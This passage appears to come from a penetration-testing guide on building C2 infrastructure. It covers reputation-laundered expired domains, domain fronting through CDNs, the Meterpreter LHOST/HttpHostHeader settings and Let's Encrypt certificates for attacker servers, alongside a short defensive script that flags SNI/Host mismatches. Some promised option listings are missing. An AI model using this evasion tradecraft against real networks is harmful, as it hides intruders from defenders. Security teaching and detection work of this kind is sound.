Domains
Domain Hunter
• Domain Hunter can search for the last 1,000 expired domains
• Domain Hunter can take a domain that you may already have and check it against all the common content filter databases
• Domain Hunter can take a keyword that you wish to use and check it for reputation; it returns a maximum of 25 results
• We can use this to acquire a domain that already has a valid reputation
Flippa
Welcome to Flippa, a website that allows people to build, sell, and buy web properties in the same way that real estate individuals flip homes
Domain Fronting
Another way to hide in regular traffic is to use a controversial technology known as domain fronting. Domain fronting was made popular by the Signal messaging product to avoid censorship in many countries. The idea behind domain fronting is to use the SNI field (Server Name Indication) and DNS fields to send traffic to a legitimate website that is hosted with a common service provider such as Amazon AWS, Google Cloud, Azure, Cloudflare, Fastly, and others. Once the packet reaches the legitimate service provider's proxy, the proxy reads the HTTP Host header, and the actual destination of the traffic will be your C2 environment. Over the years, and through abuse, many cloud service providers deprecated support for this. Amazon stated that it never officially supported this feature in CloudFront and that using it would violate the AWS EULA. Google has decided to deprecate it altogether in Google App Engine. There are, however, other service providers that still support it. The advantage here is that to the content filters and DNS filters you appear to be going to a legitimate website, while within the cloud service provider you are redirected to the actual location of the server. TLS 1.3 is trying to eliminate cleartext SNI as part of its privacy initiative, but that effort is not yet realized.
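The SNI/Host mismatch described above is also the shape a defender can key on. The following added example (not code from the original text; the record field names and log lines are constructed) flags connections whose TLS SNI and HTTP Host header name different registrable domains, which is what a TLS-inspecting proxy sees when the two disagree:

```python
"""Flag TLS connections whose SNI and HTTP Host header disagree across
registrable domains, the tell-tale shape of domain fronting."""
from typing import Dict, Iterable, List

# Constructed sample records in the shape a TLS-inspecting proxy might log.
# The field names (src, sni, host, dst) are assumptions for this example.
SAMPLE_LOG: List[Dict[str, str]] = [
    {"src": "10.0.0.5", "sni": "www.example.com", "host": "www.example.com", "dst": "203.0.113.10"},
    {"src": "10.0.0.9", "sni": "static.example.org", "host": "img.static.example.org:443", "dst": "203.0.113.30"},
    {"src": "10.0.0.7", "sni": "cdn-tenant.example.net", "host": "update.c2-placeholder.test", "dst": "203.0.113.20"},
    {"src": "10.0.0.9", "sni": "", "host": "api.example.org", "dst": "203.0.113.40"},
]


def registrable_domain(name: str) -> str:
    """Approximate the registrable domain as the last two labels.
    This deliberately ignores the public suffix list (co.uk etc.), so treat it
    as a first-pass filter rather than an exact comparison."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_fronting_candidate(record: Dict[str, str]) -> bool:
    """True when SNI and Host name different registrable domains.

    Same-domain differences (a CDN edge name vs. one of its subdomains) are
    normal for legitimate sites, so only cross-domain mismatches are flagged.
    An empty SNI gives nothing to compare and is not flagged here."""
    sni = record.get("sni", "").lower().rstrip(".")
    # The Host header may carry a port; drop it before comparing.
    host = record.get("host", "").lower().split(":")[0].rstrip(".")
    if not sni or not host or sni == host:
        return False
    return registrable_domain(sni) != registrable_domain(host)


def find_fronting_candidates(records: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the records worth a closer look, e.g. for alerting."""
    return [r for r in records if is_fronting_candidate(r)]


if __name__ == "__main__":
    for hit in find_fronting_candidates(SAMPLE_LOG):
        print(f"{hit['src']} -> SNI {hit['sni']!r} but Host {hit['host']!r} (dst {hit['dst']})")
```

Expect false positives from CDN tenants whose edge hostname legitimately differs from the Host header; tune with an allowlist of known CDN edge names before alerting on this alone.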
The following is a decent methodology for finding domain fronting websites.
Identify websites that are hosted on the target CDN and use wildcard certificates there. There are several options for this: http://bit.ly/2ShXpCK, using compiled lists like the one we just provided, or using the Wappalyzer "built with" option: http://bit.ly/3b63qet.
The next step is to register your C2 domain with that cloud service provider; some of them are self-service and some are not. Depending on the service, you may have to engage with a human.
Get a valid certificate for your C2 infrastructure; Let's Encrypt is a perfectly good choice.
Construct your C2 payload with a domain-fronting-compatible set of options, if they exist.
Meterpreter, though very well understood and discoverable, does support this. Its relevant options are:
• LHOST: In this case, this would be the fronted website, in our previous example "stackoverflow.com"
• HttpHostHeader: This is the required field for your attacker server.
Valid Cryptography
How do we give our C2 infrastructure a valid certificate? This is required knowledge for our tradecraft. One option used to be to buy certificates, but today we can do this in an automated fashion with Certbot. Certbot obtains certificates from Let's Encrypt automatically using the ACME protocol. There are very good instructions for almost any web server and almost any operating system. The requirements for Certbot are straightforward, and they are much the same across platforms.
Certbot is a Python 3 application, so you must have the Certbot tool installed; Ubuntu and other popular Linux distributions have package repositories that provide it, as listed on the Certbot website. The other requirements are on the web server itself:
• Have port 80 opened on your web server.
• Have the attacker DNS name pointing to the web server that is running Certbot.
• Run Certbot and let it place the challenge files that prove you control the name.
Remember, Let's Encrypt certificates expire after 90 days, so keep this in mind when building your infrastructure.
Once you have a valid certificate, how do you configure Metasploit to use it?
Let's Encrypt certificates live in the /etc/letsencrypt directory, but Metasploit expects a single PEM-formatted certificate file. Luckily, to build that PEM file you just need to concatenate the private key and the full chain. Once you have built this file, you can build your payload to use it.
If you use exploit/multi/handler, which is the most common handler, you need to set a few options:
For domain fronting, you also have to set options that make the handler operate in that manner:
The options above tell the handler that the payload's communication is sent to stackoverflow.com, which goes to Fastly, while the HttpHostHeader names where our actual Metasploit Framework system will live.